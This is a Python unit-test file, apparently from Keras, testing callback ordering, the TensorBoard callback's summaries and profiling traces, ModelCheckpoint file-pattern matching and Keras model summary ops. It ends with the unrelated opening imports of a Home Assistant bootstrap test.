x, y = np.ones((10, 10)), np.ones((10, 1))
my_cb = MyCallback()
# Will run 5 batches if `stop_training` doesn't work.
model.fit(x, y, batch_size=2, callbacks=[my_cb])
self.assertEqual(my_cb.batch_counter, 3)
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_built_in_callback_order(self):
class CustomCallback(keras.callbacks.Callback):
pass
class TestingCallbackList(keras.callbacks.CallbackList):
def __init__(self, *args, **kwargs):
super(TestingCallbackList, self).__init__(*args, **kwargs)
if ((not isinstance(self.callbacks[0], CustomCallback)) or
(not isinstance(self.callbacks[1], keras.callbacks.History)) or
(not isinstance(self.callbacks[2], keras.callbacks.ProgbarLogger))):
raise AssertionError(f'Callback order unexpected: {self.callbacks}')
with mock.patch.object(
keras.callbacks, 'CallbackList', TestingCallbackList):
model = keras.Sequential([keras.layers.Dense(1)])
model.compile('sgd', 'mse')
custom_callback = CustomCallback()
model.fit(np.ones((10, 10)), np.ones((10, 1)), epochs=5,
callbacks=[custom_callback])
# A summary that was emitted during a test. Fields:
# logdir: str. The logdir of the FileWriter to which the summary was
# written.
# tag: str. The name of the summary.
_ObservedSummary = collections.namedtuple('_ObservedSummary', ('logdir', 'tag'))
class _SummaryFile:
"""A record of summary tags and the files to which they were written.
Fields `scalars`, `images`, `histograms`, and `tensors` are sets
containing `_ObservedSummary` values.
"""
def __init__(self):
self.scalars = set()
self.images = set()
self.histograms = set()
self.tensors = set()
self.graph_defs = []
self.convert_from_v2_summary_proto = False
def list_summaries(logdir):
"""Read all summaries under the logdir into a `_SummaryFile`.
Args:
logdir: A path to a directory that contains zero or more event
files, either as direct children or in transitive subdirectories.
Summaries in these events must only contain old-style scalars,
images, and histograms. Non-summary events, like `graph_def`s, are
ignored.
Returns:
A `_SummaryFile` object reflecting all summaries written to any
event files in the logdir or any of its descendant directories.
Raises:
    ValueError: If an event file contains a summary of unexpected kind.
"""
result = _SummaryFile()
for (dirpath, _, filenames) in os.walk(logdir):
for filename in filenames:
if not filename.startswith('events.out.'):
continue
path = os.path.join(dirpath, filename)
for event in tf.compat.v1.train.summary_iterator(path):
if event.graph_def:
result.graph_defs.append(event.graph_def)
if not event.summary: # (e.g., it's a `graph_def` event)
continue
for value in event.summary.value:
tag = value.tag
# Case on the `value` rather than the summary metadata because
# the Keras callback uses `summary_ops_v2` to emit old-style
# summaries. See b/124535134.
kind = value.WhichOneof('value')
container = {
'simple_value': result.scalars,
'image': result.images,
'histo': result.histograms,
'tensor': result.tensors,
}.get(kind)
if container is None:
raise ValueError(
'Unexpected summary kind %r in event file %s:\n%r'
% (kind, path, event))
elif kind == 'tensor' and tag != 'keras':
# Convert the tf2 summary proto to old style for type checking.
plugin_name = value.metadata.plugin_data.plugin_name
container = {
'images': result.images,
'histograms': result.histograms,
'scalars': result.scalars,
}.get(plugin_name)
if container is not None:
result.convert_from_v2_summary_proto = True
else:
container = result.tensors
container.add(_ObservedSummary(logdir=dirpath, tag=tag))
return result
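# Rough usage sketch for the tests below: fit a model with a TensorBoard
# callback pointed at `logdir`, then inspect what was written, e.g.
#   summary_file = list_summaries(logdir)
#   assert _ObservedSummary(logdir=train_dir, tag='epoch_loss') in summary_file.scalars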
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
class TestTensorBoardV2(keras_parameterized.TestCase):
def setUp(self):
super(TestTensorBoardV2, self).setUp()
self.logdir = os.path.join(self.get_temp_dir(), 'tb')
self.train_dir = os.path.join(self.logdir, 'train')
self.validation_dir = os.path.join(self.logdir, 'validation')
def _get_model(self, compile_model=True):
layers = [
keras.layers.Conv2D(8, (3, 3)),
keras.layers.Flatten(),
keras.layers.Dense(1)
]
model = testing_utils.get_model_from_layers(layers, input_shape=(10, 10, 1))
if compile_model:
opt = gradient_descent.SGD(learning_rate=0.001)
model.compile(opt, 'mse', run_eagerly=testing_utils.should_run_eagerly())
return model
def test_TensorBoard_default_logdir(self):
"""Regression test for cross-platform pathsep in default logdir."""
os.chdir(self.get_temp_dir())
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard() # no logdir specified
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(logdir='.')
train_dir = os.path.join('.', 'logs', 'train')
validation_dir = os.path.join('.', 'logs', 'validation')
self.assertEqual(
summary_file.scalars, {
_ObservedSummary(logdir=train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=validation_dir, tag='epoch_loss'),
_ObservedSummary(
logdir=validation_dir, tag='evaluation_loss_vs_iterations'),
})
def test_TensorBoard_basic(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars, {
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
_ObservedSummary(
logdir=self.validation_dir,
tag='evaluation_loss_vs_iterations'),
})
def test_TensorBoard_across_invocations(self):
"""Regression test for summary writer resource use-after-free.
See: <https://github.com/tensorflow/tensorflow/issues/25707>
"""
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir)
for _ in (1, 2):
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars, {
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
_ObservedSummary(
logdir=self.validation_dir,
tag='evaluation_loss_vs_iterations'),
})
def test_TensorBoard_no_spurious_event_files(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir)
model.fit(
x,
y,
batch_size=2,
epochs=2,
callbacks=[tb_cbk])
events_file_run_basenames = set()
for (dirpath, _, filenames) in os.walk(self.train_dir):
if any(fn.startswith('events.out.') for fn in filenames):
events_file_run_basenames.add(os.path.basename(dirpath))
self.assertEqual(events_file_run_basenames, {'train'})
def test_TensorBoard_batch_metrics(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir, update_freq=1)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
_ObservedSummary(
logdir=self.validation_dir,
tag='evaluation_loss_vs_iterations'),
},
)
def test_TensorBoard_learning_rate_schedules(self):
model = self._get_model(compile_model=False)
opt = gradient_descent.SGD(learning_rate_schedule.CosineDecay(0.01, 1))
model.compile(opt, 'mse', run_eagerly=testing_utils.should_run_eagerly())
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
model.fit(
x,
y,
batch_size=2,
epochs=2,
callbacks=[keras.callbacks.TensorBoard(self.logdir)])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.train_dir, tag='epoch_learning_rate'),
},
)
def test_TensorBoard_global_step(self):
model = self._get_model(compile_model=False)
opt = gradient_descent.SGD(learning_rate_schedule.CosineDecay(0.01, 1))
model.compile(opt, 'mse', run_eagerly=testing_utils.should_run_eagerly())
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
model.fit(
x,
y,
batch_size=2,
epochs=2,
verbose=0,
callbacks=[
keras.callbacks.TensorBoard(
self.logdir,
update_freq=1,
profile_batch=0,
write_steps_per_second=True)
])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.train_dir, tag='epoch_learning_rate'),
_ObservedSummary(
logdir=self.train_dir, tag='epoch_steps_per_second'),
_ObservedSummary(
logdir=self.train_dir, tag='batch_steps_per_second'),
},
)
def test_TensorBoard_weight_histograms(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir, histogram_freq=1)
model_type = testing_utils.get_model_type()
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
_ObservedSummary(
logdir=self.validation_dir,
tag='evaluation_loss_vs_iterations'),
},
)
self.assertEqual(
self._strip_layer_names(summary_file.histograms, model_type),
{
_ObservedSummary(logdir=self.train_dir, tag='bias_0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0'),
},
)
def test_TensorBoard_weight_images(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, write_images=True)
model_type = testing_utils.get_model_type()
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
_ObservedSummary(
logdir=self.validation_dir,
tag='evaluation_loss_vs_iterations'),
},
)
self.assertEqual(
self._strip_layer_names(summary_file.histograms, model_type),
{
_ObservedSummary(logdir=self.train_dir, tag='bias_0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0'),
},
)
if summary_file.convert_from_v2_summary_proto:
expected = {
_ObservedSummary(logdir=self.train_dir, tag='bias_0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0'),
}
else:
expected = {
_ObservedSummary(logdir=self.train_dir, tag='bias_0/image/0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0/image/0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0/image/1'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0/image/2'),
}
self.assertEqual(
self._strip_layer_names(summary_file.images, model_type),
expected
)
def test_TensorBoard_projector_callback(self):
layers = [
keras.layers.Embedding(10, 10, name='test_embedding'),
keras.layers.Dense(10, activation='relu'),
keras.layers.Dense(1, activation='sigmoid')
]
model = testing_utils.get_model_from_layers(layers, input_shape=(10,))
model.compile(
optimizer='adam',
loss=keras.losses.BinaryCrossentropy(from_logits=True),
run_eagerly=testing_utils.should_run_eagerly())
x, y = np.ones((10, 10)), np.ones((10, 10))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir,
embeddings_freq=1,
embeddings_metadata={'test_embedding': 'metadata.tsv'})
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
with open(os.path.join(self.logdir, 'projector_config.pbtxt')) as f:
self.assertEqual(f.readlines(), [
'embeddings {\n',
(' tensor_name: '
'"layer_with_weights-0/embeddings/.ATTRIBUTES/VARIABLE_VALUE"\n'),
' metadata_path: "metadata.tsv"\n', '}\n'
])
def test_custom_summary(self):
if not tf.executing_eagerly():
self.skipTest('Custom summaries only supported in V2 code path.')
def scalar_v2_mock(name, data, step=None):
"""A reimplementation of the scalar plugin to avoid circular deps."""
metadata = tf.compat.v1.SummaryMetadata()
# Should match value in tensorboard/plugins/scalar/metadata.py.
metadata.plugin_data.plugin_name = 'scalars'
with tf.summary.experimental.summary_scope(
name, 'scalar_summary', values=[data, step]) as (tag, _):
return tf.summary.write(
tag=tag,
tensor=tf.cast(data, 'float32'),
step=step,
metadata=metadata)
class LayerWithSummary(keras.layers.Layer):
def call(self, x):
scalar_v2_mock('custom_summary', tf.reduce_sum(x))
return x
model = testing_utils.get_model_from_layers([LayerWithSummary()],
input_shape=(5,),
name='model')
model.compile(
'sgd',
'mse',
run_eagerly=testing_utils.should_run_eagerly())
tb_cbk = keras.callbacks.TensorBoard(self.logdir, update_freq=1)
x, y = np.ones((10, 5)), np.ones((10, 5))
model.fit(x, y, batch_size=2, validation_data=(x, y), callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
_ObservedSummary(
logdir=self.validation_dir,
tag='evaluation_loss_vs_iterations'),
_ObservedSummary(
logdir=self.train_dir,
tag='model/layer_with_summary/custom_summary'),
_ObservedSummary(
logdir=self.validation_dir,
tag='model/layer_with_summary/custom_summary')
},
)
def _strip_layer_names(self, summaries, model_type):
"""Deduplicate summary names modulo layer prefix.
This removes the first slash-component of each tag name: for
instance, "foo/bar/baz" becomes "bar/baz".
Args:
summaries: A `set` of `_ObservedSummary` values.
model_type: The model type currently being tested.
Returns:
A new `set` of `_ObservedSummary` values with layer prefixes
removed.
"""
result = set()
for summary in summaries:
if '/' not in summary.tag:
raise ValueError('tag has no layer name: %r' % summary.tag)
start_from = 2 if 'subclass' in model_type else 1
new_tag = '/'.join(summary.tag.split('/')[start_from:])
result.add(summary._replace(tag=new_tag))
return result
def test_TensorBoard_invalid_argument(self):
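    # `wwrite_images` is deliberately misspelled; TensorBoard is expected to
    # reject keyword arguments it does not recognize.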
with self.assertRaisesRegex(ValueError, 'Unrecognized arguments'):
keras.callbacks.TensorBoard(wwrite_images=True)
def test_TensorBoard_non_blocking(self):
model = keras.Sequential([keras.layers.Dense(1)])
tb = keras.callbacks.TensorBoard(self.logdir)
self.assertTrue(tb._supports_tf_logs)
cb_list = keras.callbacks.CallbackList([tb],
model=model,
epochs=1,
steps=100,
verbose=0)
tensor = tf.convert_to_tensor(1.)
def mock_numpy():
raise RuntimeError(
'If this error is seen, TensorBoard is causing a blocking '
'NumPy conversion.')
with tf.compat.v1.test.mock.patch.object(tensor, 'numpy', mock_numpy):
logs = {'metric': tensor}
cb_list.on_train_begin(logs)
cb_list.on_epoch_begin(0, logs)
cb_list.on_train_batch_begin(0, logs)
cb_list.on_train_batch_end(0, logs)
cb_list.on_epoch_end(0, logs)
cb_list.on_train_end(logs)
cb_list.on_test_begin(logs)
cb_list.on_test_batch_begin(0, logs)
cb_list.on_test_batch_end(0, logs)
cb_list.on_test_end(logs)
cb_list.on_predict_begin(logs)
      cb_list.on_predict_batch_begin(0, logs)
      cb_list.on_predict_batch_end(0, logs)
cb_list.on_predict_end(logs)
# Note that this test specifies model_type explicitly.
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
class TestTensorBoardV2NonParameterizedTest(keras_parameterized.TestCase):
def setUp(self):
super(TestTensorBoardV2NonParameterizedTest, self).setUp()
self.logdir = os.path.join(self.get_temp_dir(), 'tb')
self.train_dir = os.path.join(self.logdir, 'train')
self.validation_dir = os.path.join(self.logdir, 'validation')
def _get_seq_model(self):
model = keras.models.Sequential([
keras.layers.Conv2D(8, (3, 3), input_shape=(10, 10, 1)),
keras.layers.Flatten(),
keras.layers.Dense(1),
])
opt = gradient_descent.SGD(learning_rate=0.001)
model.compile(
opt,
'mse',
run_eagerly=testing_utils.should_run_eagerly())
return model
def _count_trace_file(self, logdir):
profile_dir = os.path.join(logdir, 'plugins', 'profile')
count = 0
for (dirpath, dirnames, filenames) in os.walk(profile_dir):
del dirpath # unused
del dirnames # unused
for filename in filenames:
if filename.endswith('.trace.json.gz'):
count += 1
return count
def fitModelAndAssertKerasModelWritten(self, model):
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir,
write_graph=True,
profile_batch=0)
model.fit(
x,
y,
batch_size=2,
epochs=3,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.tensors,
{
_ObservedSummary(logdir=self.train_dir, tag='keras'),
},
)
if not model.run_eagerly:
# There should be one train graph
self.assertLen(summary_file.graph_defs, 1)
for graph_def in summary_file.graph_defs:
graph_def_str = str(graph_def)
# All the model layers should appear in the graphs
for layer in model.layers:
if 'input' not in layer.name:
self.assertIn(layer.name, graph_def_str)
def test_TensorBoard_writeSequentialModel_noInputShape(self):
model = keras.models.Sequential([
keras.layers.Conv2D(8, (3, 3)),
keras.layers.Flatten(),
keras.layers.Dense(1),
])
model.compile('sgd', 'mse', run_eagerly=testing_utils.should_run_eagerly())
self.fitModelAndAssertKerasModelWritten(model)
def test_TensorBoard_writeSequentialModel_withInputShape(self):
model = keras.models.Sequential([
keras.layers.Conv2D(8, (3, 3), input_shape=(10, 10, 1)),
keras.layers.Flatten(),
keras.layers.Dense(1),
])
model.compile('sgd', 'mse', run_eagerly=testing_utils.should_run_eagerly())
self.fitModelAndAssertKerasModelWritten(model)
def test_TensorBoard_writeModel(self):
inputs = keras.layers.Input([10, 10, 1])
x = keras.layers.Conv2D(8, (3, 3), activation='relu')(inputs)
x = keras.layers.Flatten()(x)
x = keras.layers.Dense(1)(x)
model = keras.models.Model(inputs=inputs, outputs=[x])
model.compile('sgd', 'mse', run_eagerly=testing_utils.should_run_eagerly())
self.fitModelAndAssertKerasModelWritten(model)
def test_TensorBoard_autoTrace(self):
model = self._get_seq_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch=1, write_graph=False)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.tensors,
{
_ObservedSummary(logdir=self.train_dir, tag=u'batch_1'),
},
)
self.assertEqual(1, self._count_trace_file(logdir=self.logdir))
def test_TensorBoard_autoTrace_outerProfiler(self):
"""Runs a profiler session that interferes with the one from the callback.
The callback will not generate a profile but execution will proceed without
crashing due to unhandled exceptions.
"""
tf.profiler.experimental.start(logdir='')
model = self._get_seq_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch=1, write_graph=False)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
tf.profiler.experimental.stop(save=False)
self.assertEqual(
summary_file.tensors,
{
_ObservedSummary(logdir=self.train_dir, tag=u'batch_1'),
},
)
self.assertEqual(0, self._count_trace_file(logdir=self.train_dir))
def test_TensorBoard_autoTrace_tagNameWithBatchNum(self):
model = self._get_seq_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch=2, write_graph=False)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.tensors,
{
_ObservedSummary(logdir=self.train_dir, tag=u'batch_2'),
},
)
self.assertEqual(1, self._count_trace_file(logdir=self.logdir))
def test_TensorBoard_autoTrace_profileBatchRangeSingle(self):
model = self._get_seq_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch='2,2', write_graph=False)
model.fit(
x,
y,
batch_size=3,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.tensors,
{
# Trace will be logged once at the batch it stops profiling.
_ObservedSummary(logdir=self.train_dir, tag=u'batch_2'),
},
)
self.assertEqual(1, self._count_trace_file(logdir=self.logdir))
def test_TensorBoard_autoTrace_profileBatchRangeTwice(self):
model = self._get_seq_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch='10,10', write_graph=False)
model.fit(
x,
y,
batch_size=3,
epochs=10,
validation_data=(x, y),
callbacks=[tb_cbk])
    time.sleep(1)  # Avoids the second profile overwriting the first.
model.fit(
x,
y,
batch_size=3,
epochs=10,
validation_data=(x, y),
callbacks=[tb_cbk])
self.assertEqual(2, self._count_trace_file(logdir=self.logdir))
  # Test case that replicates a GitHub issue:
# https://github.com/tensorflow/tensorflow/issues/37543
def test_TensorBoard_autoTrace_profileTwiceGraphMode(self):
tf.compat.v1.disable_eager_execution()
inp = keras.Input((1,))
out = keras.layers.Dense(units=1)(inp)
model = keras.Model(inp, out)
model.compile(gradient_descent.SGD(1), 'mse')
logdir = os.path.join(self.get_temp_dir(), 'tb1')
model.fit(
np.zeros((64, 1)),
np.zeros((64, 1)),
batch_size=32,
callbacks=[keras.callbacks.TensorBoard(logdir, profile_batch=1)],
)
# Verifies trace exists in the first logdir.
self.assertEqual(1, self._count_trace_file(logdir=logdir))
logdir = os.path.join(self.get_temp_dir(), 'tb2')
model.fit(
np.zeros((64, 1)),
np.zeros((64, 1)),
batch_size=32,
callbacks=[keras.callbacks.TensorBoard(logdir, profile_batch=2)],
)
# Verifies trace exists in the second logdir.
self.assertEqual(1, self._count_trace_file(logdir=logdir))
def test_TensorBoard_autoTrace_profileBatchRange(self):
model = self._get_seq_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch='1,3', write_graph=False)
model.fit(
x,
y,
batch_size=4,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.tensors,
{
# Trace will be logged once at the batch it stops profiling.
_ObservedSummary(logdir=self.train_dir, tag=u'batch_3'),
},
)
self.assertEqual(1, self._count_trace_file(logdir=self.logdir))
def test_TensorBoard_autoTrace_profileInvalidBatchRange(self):
with self.assertRaises(ValueError):
keras.callbacks.TensorBoard(
self.logdir,
histogram_freq=1,
profile_batch='-1,3',
write_graph=False)
with self.assertRaises(ValueError):
keras.callbacks.TensorBoard(
self.logdir,
histogram_freq=1,
profile_batch='1,None',
write_graph=False)
with self.assertRaises(ValueError):
keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch='6,5', write_graph=False)
with self.assertRaises(ValueError):
keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch=-1, write_graph=False)
def test_TensorBoard_autoTrace_profile_batch_largerThanBatchCount(self):
model = self._get_seq_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch=10000, write_graph=False)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
    # Tracing was enabled only for the 10,000th batch, which is never reached,
    # so no trace summary should have been written.
self.assertEmpty(summary_file.tensors)
self.assertEqual(0, self._count_trace_file(logdir=self.train_dir))
class MostRecentlyModifiedFileMatchingPatternTest(tf.test.TestCase):
def test_get_most_recently_modified_file_matching_pattern(self):
file_pattern = 'f.batch{batch:02d}epoch{epoch:02d}.h5'
test_dir = self.get_temp_dir()
path_pattern = os.path.join(test_dir, file_pattern)
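    # The files below are written oldest-to-newest with a delay in between, so
    # the most recently modified match is the last entry, f.batch01epoch01.h5.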
file_paths = [
os.path.join(test_dir, file_name) for file_name in
['f.batch03epoch02.h5', 'f.batch02epoch02.h5', 'f.batch01epoch01.h5']
]
for file_path in file_paths:
with open(file_path, 'w') as f:
        # Ensure there is some interval between file creations.
time.sleep(2)
f.write('foo bar')
# Ensure the files have been actually written.
self.assertEqual(
set([
os.path.join(test_dir, file_name)
for file_name in os.listdir(test_dir)
]), set(file_paths))
self.assertEqual(
keras.callbacks.ModelCheckpoint(None)
._get_most_recently_modified_file_matching_pattern(path_pattern),
file_paths[-1])
def test_some_file_not_matching_pattern(self):
file_pattern = 'f.batch{batch:02d}epoch{epoch:02d}.h5'
test_dir = self.get_temp_dir()
path_pattern = os.path.join(test_dir, file_pattern)
file_paths = [
os.path.join(test_dir, file_name) for file_name in
['f.batch03epoch02.h5', 'f.batch02epoch02.h5', 'f.baatch01epoch01.h5']
]
for file_path in file_paths:
with open(file_path, 'w') as f:
        # Ensure there is some interval between file creations.
time.sleep(2)
f.write('foo bar')
self.assertEqual(
keras.callbacks.ModelCheckpoint(None)
._get_most_recently_modified_file_matching_pattern(path_pattern),
file_paths[-2])
def test_get_same_file_if_file_name_equals_pattern(self):
file_name = 'f.batch02.h5'
test_dir = self.get_temp_dir()
file_path = os.path.join(test_dir, file_name)
with open(file_path, 'w') as f:
f.write('foo bar')
self.assertEqual(os.path.join(test_dir, os.listdir(test_dir)[0]), file_path)
self.assertEqual(
keras.callbacks.ModelCheckpoint(
None)._get_most_recently_modified_file_matching_pattern(file_path),
file_path)
def test_get_none_if_file_does_not_exist(self):
file_name = 'f.batch02.h5'
test_dir = self.get_temp_dir()
file_path = os.path.join(test_dir, file_name)
self.assertLen(os.listdir(test_dir), 0)
self.assertEqual(
keras.callbacks.ModelCheckpoint(
None)._get_most_recently_modified_file_matching_pattern(file_path),
None)
def test_using_checkpoint_management_latest_checkpoint(self):
file_pattern = 'f.batch{batch:02d}epoch{epoch:02d}'
ckpt_file_name = 'f.batchXepochY'
test_dir = self.get_temp_dir()
path_pattern = os.path.join(test_dir, file_pattern)
ckpt_file_path = os.path.join(test_dir, ckpt_file_name)
with open(ckpt_file_path, 'w') as f:
f.write('dummy ckpt')
tf.__internal__.train.update_checkpoint_state(
test_dir, ckpt_file_path)
file_paths = [
os.path.join(test_dir, file_name)
for file_name in ['f.batch03epoch02', 'f.batch02epoch02']
]
for file_path in file_paths:
with open(file_path, 'w') as f:
f.write('foo bar')
# The result returned from checkpoint_management.latest_checkpoint takes
# priority, so even if it was written earlier, we should still return that.
self.assertEqual(
keras.callbacks.ModelCheckpoint(None)
._get_most_recently_modified_file_matching_pattern(path_pattern),
ckpt_file_path)
class SummaryOpsTest(tf.test.TestCase):
def tearDown(self):
super(SummaryOpsTest, self).tearDown()
tf.summary.trace_off()
def keras_model(self, *args, **kwargs):
logdir = self.get_temp_dir()
writer = tf.summary.create_file_writer(logdir)
with writer.as_default():
keras.callbacks.keras_model_summary(*args, **kwargs)
writer.close()
events = events_from_logdir(logdir)
# The first event contains no summary values. The written content goes to
# the second event.
return events[1]
@testing_utils.run_v2_only
def testKerasModel(self):
model = keras.Sequential(
[Dense(10, input_shape=(100,)),
Activation('relu', name='my_relu')])
event = self.keras_model(name='my_name', data=model, step=1)
first_val = event.summary.value[0]
self.assertEqual(model.to_json(), first_val.tensor.string_val[0].decode())
@testing_utils.run_v2_only
def testKerasModel_usesDefaultStep(self):
model = keras.Sequential(
[Dense(10, input_shape=(100,)),
Activation('relu', name='my_relu')])
try:
tf.summary.experimental.set_step(42)
event = self.keras_model(name='my_name', data=model)
self.assertEqual(42, event.step)
finally:
# Reset to default state for other tests.
tf.summary.experimental.set_step(None)
@testing_utils.run_v2_only
def testKerasModel_subclass(self):
class SimpleSubclass(keras.Model):
def __init__(self):
super(SimpleSubclass, self).__init__(name='subclass')
self.dense = Dense(10, input_shape=(100,))
self.activation = Activation('relu', name='my_relu')
def call(self, inputs):
x = self.dense(inputs)
return self.activation(x)
model = SimpleSubclass()
with tf.compat.v1.test.mock.patch.object(logging, 'warning') as mock_log:
self.assertFalse(
keras.callbacks.keras_model_summary(
name='my_name', data=model, step=1))
self.assertRegex(
str(mock_log.call_args), 'Model failed to serialize as JSON.')
@testing_utils.run_v2_only
def testKerasModel_otherExceptions(self):
model = keras.Sequential()
with tf.compat.v1.test.mock.patch.object(model, 'to_json') as mock_to_json:
with tf.compat.v1.test.mock.patch.object(logging, 'warning') as mock_log:
mock_to_json.side_effect = Exception('oops')
self.assertFalse(
keras.callbacks.keras_model_summary(
name='my_name', data=model, step=1))
self.assertRegex(
str(mock_log.call_args),
'Model failed to serialize as JSON. Ignoring')
def events_from_file(filepath):
"""Returns all events in a single event file.
Args:
filepath: Path to the event file.
Returns:
A list of all tf.Event protos in the event file.
"""
result = []
raw_dataset = tf.data.TFRecordDataset([filepath])
for raw_record in raw_dataset.take(10):
event = tf.compat.v1.Event()
event.ParseFromString(raw_record.numpy())
result.append(event)
return result
def events_from_logdir(logdir):
"""Returns all events in the single eventfile in logdir.
Args:
logdir: The directory in which the single event file is sought.
Returns:
A list of all tf.Event protos from the single event file.
Raises:
AssertionError: If logdir does not contain exactly one file.
"""
assert tf.compat.v1.gfile.Exists(logdir)
files = tf.compat.v1.gfile.ListDirectory(logdir)
  assert len(files) == 1, 'Expected exactly one file in logdir, found: %s' % files
return events_from_file(os.path.join(logdir, files[0]))
if __name__ == '__main__':
tf.test.main()
|
test_bootstrap.py
|
"""Test the bootstrapping."""
# pylint: disable=protected-access
import os
from unittest import mock
import threading
import logging
import voluptuous as vol
from homeassistant.core import callback
from homeassistant.const import EVENT_HOMEASSISTANT_START
import homeassistant.config as config_util
from homeassistant import bootstrap, loader
import homeassistant.util.dt as dt_util
from homeassistant.helpers.config_validation import PLATFORM_SCHEMA
from homeassistant.helpers import discovery
from tests.common import \
get_test_home_assistant, MockModule, MockPlatform, \
assert_setup_component, patch_yaml_files, get_test_config_dir
